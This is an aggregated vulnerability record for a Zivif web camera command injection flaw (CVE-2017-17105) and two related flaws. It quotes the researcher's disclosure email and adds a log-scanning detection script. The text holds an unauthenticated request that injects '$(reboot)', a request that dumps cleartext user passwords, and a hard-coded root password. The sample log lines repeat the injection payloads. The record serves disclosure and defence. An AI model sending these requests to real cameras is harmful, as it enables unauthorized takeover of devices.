ID

VAR-201712-0828


CVE

CVE-2017-17105


TITLE

Command injection vulnerability in Zivif web camera

Trust: 0.8

sources: JVNDB: JVNDB-2017-011810

DESCRIPTION

Zivif PR115-204-P-RS V2.3.4.2103 and V4.7.4.2121 (and possibly in-between versions) web cameras are vulnerable to unauthenticated, blind remote command injection via CGI scripts used as part of the web interface, as demonstrated by a cgi-bin/iptest.cgi?cmd=iptest.cgi&-time="1504225666237"&-url=$(reboot) request.

The Zivif web camera contains a command injection vulnerability. Information may be obtained or altered, and service operation may be disrupted (DoS).

The Zivif PR115-204-P-RS is a network camera device. A remote command injection vulnerability exists in the Zivif PR115-204-P-RS 2.3.4.2103 release. A remote attacker can exploit this vulnerability to inject arbitrary commands. This vulnerability stems from the fact that the network system or product does not correctly filter special elements in the process of constructing executable commands from external input data.

Attack vector: Remote
Authentication: None
Researcher: Silas Cutler `p1nk` <silas.cutler@blacklistthisdomain.com>
Release date: December 10, 2017
Full Disclosure: 90 days
CVEs: CVE-2017-17105, CVE-2017-17106, and CVE-2017-17107
Vulnerable Device: Zivif PR115-204-P-RS
Version: V2.3.4.2103

Timeline:
1 September 2017: Initial alerting to Zivif
1 September 2017: Zivif contact established.
3 September 2017: Details provided.
7 September 2017: Confirmation of vulnerabilities from Zivif
5 December 2017: Public note on Social Media CVE-2017-17105, CVE-2017-17106, and CVE-2017-17107 would be included in HackerStrip comic.
10 December 2017: This email

-[Overview]-
Implementation of access controls in Zivif cameras is severely lacking. As a result, CGI functions can be called directly, bypassing authentication checks.

This was first identified with the following request (CVE-2017-17106)

    http://<Camera Address>/web/cgi-bin/hi3510/param.cgi?cmd=getuser

Cameras respond to this with:

    var name0="admin"; var password0="admin"; var authLevel0="255";
    var name1="guest"; var password1="guest"; var authLevel1="3";
    var name2="admin2"; var password2="admin"; var authLevel2="3";
    var name3=""; var password3=""; var authLevel3="3";
    var name4=""; var password4=""; var authLevel4="3";
    var name5=""; var password5=""; var authLevel5="3";
    var name6=""; var password6=""; var authLevel6="3";
    var name7=""; var password7=""; var authLevel7="3";
    var name8=""; var password8=""; var authLevel8="0";
    var name9=""; var password9=""; var authLevel9="0

Credentials are returned in cleartext to the requester.

One last finding was the /etc/passwd file contains the following hard-coded entry (CVE-2017-17107):

    root:$1$xFoO/s3I$zRQPwLG2yX1biU31a2wxN/:0:0::/root:/bin/sh

The encrypted password is cat1029.

    (none) login: root
    Password:
    Login incorrect
    (none) login: root
    Password:
    Welcome to SONIX.
    \u@\h:\W$

Because of the way the file system is structured, changing this password requires more work than running passwd.

-[Note]-
The hi3510 is shared with a couple other cameras I'm exploring. The motd saying /Welcome to SONIX/ has led me to speculate parts of this firmware may be shared with other cameras.

-Silas

Trust: 2.43

sources: NVD: CVE-2017-17105 // JVNDB: JVNDB-2017-011810 // CNVD: CNVD-2018-01360 // VULHUB: VHN-108094 // VULMON: CVE-2017-17105 // PACKETSTORM: 145386
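A detection sketch for the two HTTP requests described above, added here as an example and not part of the original advisory or of any vendor code: it scans access-log request lines for the param.cgi?cmd=getuser call and for shell metacharacters in the -url parameter of iptest.cgi. It assumes a proxy or sensor in front of the cameras that writes Common Log Format; the log lines and the names SAMPLE_LOG, params, classify and flag_requests are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Characters that let a parameter value break out into a shell command:
# $( ) and backtick substitution, the ; | & separators, and line breaks.
SHELL_META = re.compile(r"\$\(|`|[;|&\r\n]")
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

# Constructed proxy log lines (documentation addresses), not captured traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [10/Dec/2017:10:00:00 +0000] "GET /web/cgi-bin/hi3510/param.cgi?cmd=getuser HTTP/1.1" 200 512',
    '192.0.2.11 - - [10/Dec/2017:10:00:05 +0000] "GET /cgi-bin/iptest.cgi?cmd=iptest.cgi&-time=%221504225666237%22&-url=$(reboot) HTTP/1.1" 200 0',
    '192.0.2.12 - - [10/Dec/2017:10:00:09 +0000] "GET /cgi-bin/iptest.cgi?cmd=iptest.cgi&-url=%24%28reboot%29 HTTP/1.1" 200 0',
    '192.0.2.13 - - [10/Dec/2017:10:01:00 +0000] "GET /cgi-bin/iptest.cgi?cmd=iptest.cgi&-url=192.0.2.1 HTTP/1.1" 200 0',
    '192.0.2.14 - - [10/Dec/2017:10:02:00 +0000] "GET /web/cgi-bin/hi3510/param.cgi?cmd=other HTTP/1.1" 200 90',
]

def params(query):
    """Split a raw query string and percent-decode each key and value."""
    out = {}
    for pair in query.split("&"):
        key, _, value = pair.partition("=")
        out.setdefault(unquote_plus(key), []).append(unquote_plus(value))
    return out

def classify(target):
    """Return a finding label for one request target, or None."""
    parts = urlsplit(target)
    script = parts.path.rsplit("/", 1)[-1].lower()
    query = params(parts.query)
    if script == "param.cgi" and "getuser" in query.get("cmd", []):
        return "CVE-2017-17106: user list requested"
    if script == "iptest.cgi" and any(SHELL_META.search(v) for v in query.get("-url", [])):
        return "CVE-2017-17105: shell metacharacters in -url"
    return None

def flag_requests(log_lines):
    """Return (source address, finding) for every suspicious request line."""
    findings = []
    for line in log_lines:
        match = REQUEST.search(line)
        label = classify(match.group(1)) if match else None
        if label:
            findings.append((line.split(" ", 1)[0], label))
    return findings

if __name__ == "__main__":
    for source, label in flag_requests(SAMPLE_LOG):
        print(source, label)
```

Values are percent-decoded before matching, so the encoded form of the same -url value is flagged as well as the literal one.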

IOT TAXONOMY

category: ['Network device'], sub_category: -

Trust: 0.6

sources: CNVD: CNVD-2018-01360

AFFECTED PRODUCTS

vendor: zivif, model: pr115-204-p-rs, scope: eq, version: 2.3.4.2103

Trust: 3.0

vendor: zivif, model: pr115-204-p-rs, scope: eq, version: 4.7.4.2121

Trust: 1.0

sources: CNVD: CNVD-2018-01360 // JVNDB: JVNDB-2017-011810 // CNNVD: CNNVD-201712-147 // NVD: CVE-2017-17105

CVSS

SEVERITY

CVSSV2

CVSSV3

nvd@nist.gov: CVE-2017-17105
value: CRITICAL

Trust: 1.0

NVD: CVE-2017-17105
value: CRITICAL

Trust: 0.8

CNVD: CNVD-2018-01360
value: HIGH

Trust: 0.6

CNNVD: CNNVD-201712-147
value: CRITICAL

Trust: 0.6

VULHUB: VHN-108094
value: HIGH

Trust: 0.1

VULMON: CVE-2017-17105
value: HIGH

Trust: 0.1

nvd@nist.gov: CVE-2017-17105
severity: HIGH
baseScore: 10.0
vectorString: AV:N/AC:L/AU:N/C:C/I:C/A:C
accessVector: NETWORK
accessComplexity: LOW
authentication: NONE
confidentialityImpact: COMPLETE
integrityImpact: COMPLETE
availabilityImpact: COMPLETE
exploitabilityScore: 10.0
impactScore: 10.0
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 1.9

CNVD: CNVD-2018-01360
severity: HIGH
baseScore: 10.0
vectorString: AV:N/AC:L/AU:N/C:C/I:C/A:C
accessVector: NETWORK
accessComplexity: LOW
authentication: NONE
confidentialityImpact: COMPLETE
integrityImpact: COMPLETE
availabilityImpact: COMPLETE
exploitabilityScore: 10.0
impactScore: 10.0
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.6

VULHUB: VHN-108094
severity: HIGH
baseScore: 10.0
vectorString: AV:N/AC:L/AU:N/C:C/I:C/A:C
accessVector: NETWORK
accessComplexity: LOW
authentication: NONE
confidentialityImpact: COMPLETE
integrityImpact: COMPLETE
availabilityImpact: COMPLETE
exploitabilityScore: 10.0
impactScore: 10.0
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.1

nvd@nist.gov: CVE-2017-17105
baseSeverity: CRITICAL
baseScore: 9.8
vectorString: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
attackVector: NETWORK
attackComplexity: LOW
privilegesRequired: NONE
userInteraction: NONE
scope: UNCHANGED
confidentialityImpact: HIGH
integrityImpact: HIGH
availabilityImpact: HIGH
exploitabilityScore: 3.9
impactScore: 5.9
version: 3.0

Trust: 1.8

sources: CNVD: CNVD-2018-01360 // VULHUB: VHN-108094 // VULMON: CVE-2017-17105 // JVNDB: JVNDB-2017-011810 // CNNVD: CNNVD-201712-147 // NVD: CVE-2017-17105

PROBLEMTYPE DATA

problemtype:CWE-78

Trust: 1.1

problemtype:CWE-77

Trust: 0.9

sources: VULHUB: VHN-108094 // JVNDB: JVNDB-2017-011810 // NVD: CVE-2017-17105

THREAT TYPE

remote

Trust: 0.6

sources: CNNVD: CNNVD-201712-147

TYPE

operating system command injection

Trust: 0.6

sources: CNNVD: CNNVD-201712-147

CONFIGURATIONS

sources: JVNDB: JVNDB-2017-011810

EXPLOIT AVAILABILITY

sources: VULHUB: VHN-108094

PATCH

title: Top Page, url: http://zivif.com/

Trust: 0.8

sources: JVNDB: JVNDB-2017-011810

EXTERNAL IDS

db: NVD, id: CVE-2017-17105

Trust: 3.3

db: PACKETSTORM, id: 145386

Trust: 3.3

db: PACKETSTORM, id: 158120

Trust: 1.8

db: JVNDB, id: JVNDB-2017-011810

Trust: 0.8

db: CNNVD, id: CNNVD-201712-147

Trust: 0.7

db: CNVD, id: CNVD-2018-01360

Trust: 0.6

db: CXSECURITY, id: WLB-2020060066

Trust: 0.6

db: VULHUB, id: VHN-108094

Trust: 0.1

db: VULMON, id: CVE-2017-17105

Trust: 0.1

sources: CNVD: CNVD-2018-01360 // VULHUB: VHN-108094 // VULMON: CVE-2017-17105 // JVNDB: JVNDB-2017-011810 // PACKETSTORM: 145386 // CNNVD: CNNVD-201712-147 // NVD: CVE-2017-17105

REFERENCES

url:http://packetstormsecurity.com/files/145386/zivif-pr115-204-p-rs-2.3.4.2103-bypass-command-injection-hardcoded-password.html

Trust: 3.8

url:https://twitter.com/silascutler/status/938052460328968192

Trust: 2.6

url:http://packetstormsecurity.com/files/158120/zivif-camera-2.3.4.2103-iptest.cgi-blind-remote-command-execution.html

Trust: 1.9

url:http://seclists.org/fulldisclosure/2017/dec/42

Trust: 1.8

url:https://nvd.nist.gov/vuln/detail/cve-2017-17105

Trust: 0.9

url:https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-17105

Trust: 0.8

url:https://cxsecurity.com/issue/wlb-2020060066

Trust: 0.6

url:https://cwe.mitre.org/data/definitions/78.html

Trust: 0.1

url:https://nvd.nist.gov

Trust: 0.1

url:http://<camera

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2017-17107

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2017-17106

Trust: 0.1

sources: CNVD: CNVD-2018-01360 // VULHUB: VHN-108094 // VULMON: CVE-2017-17105 // JVNDB: JVNDB-2017-011810 // PACKETSTORM: 145386 // CNNVD: CNNVD-201712-147 // NVD: CVE-2017-17105

CREDITS

Silas Cutler

Trust: 0.7

sources: PACKETSTORM: 145386 // CNNVD: CNNVD-201712-147

SOURCES

db: CNVD, id: CNVD-2018-01360
db: VULHUB, id: VHN-108094
db: VULMON, id: CVE-2017-17105
db: JVNDB, id: JVNDB-2017-011810
db: PACKETSTORM, id: 145386
db: CNNVD, id: CNNVD-201712-147
db: NVD, id: CVE-2017-17105

LAST UPDATE DATE

2024-08-14T14:33:18.587000+00:00


SOURCES UPDATE DATE

db: CNVD, id: CNVD-2018-01360, date: 2018-01-19T00:00:00
db: VULHUB, id: VHN-108094, date: 2020-06-16T00:00:00
db: VULMON, id: CVE-2017-17105, date: 2020-06-16T00:00:00
db: JVNDB, id: JVNDB-2017-011810, date: 2018-01-29T00:00:00
db: CNNVD, id: CNNVD-201712-147, date: 2020-06-18T00:00:00
db: NVD, id: CVE-2017-17105, date: 2020-06-16T22:15:10.037

SOURCES RELEASE DATE

db: CNVD, id: CNVD-2018-01360, date: 2018-01-19T00:00:00
db: VULHUB, id: VHN-108094, date: 2017-12-19T00:00:00
db: VULMON, id: CVE-2017-17105, date: 2017-12-19T00:00:00
db: JVNDB, id: JVNDB-2017-011810, date: 2018-01-29T00:00:00
db: PACKETSTORM, id: 145386, date: 2017-12-13T16:50:24
db: CNNVD, id: CNNVD-201712-147, date: 2017-12-05T00:00:00
db: NVD, id: CVE-2017-17105, date: 2017-12-19T02:29:41.550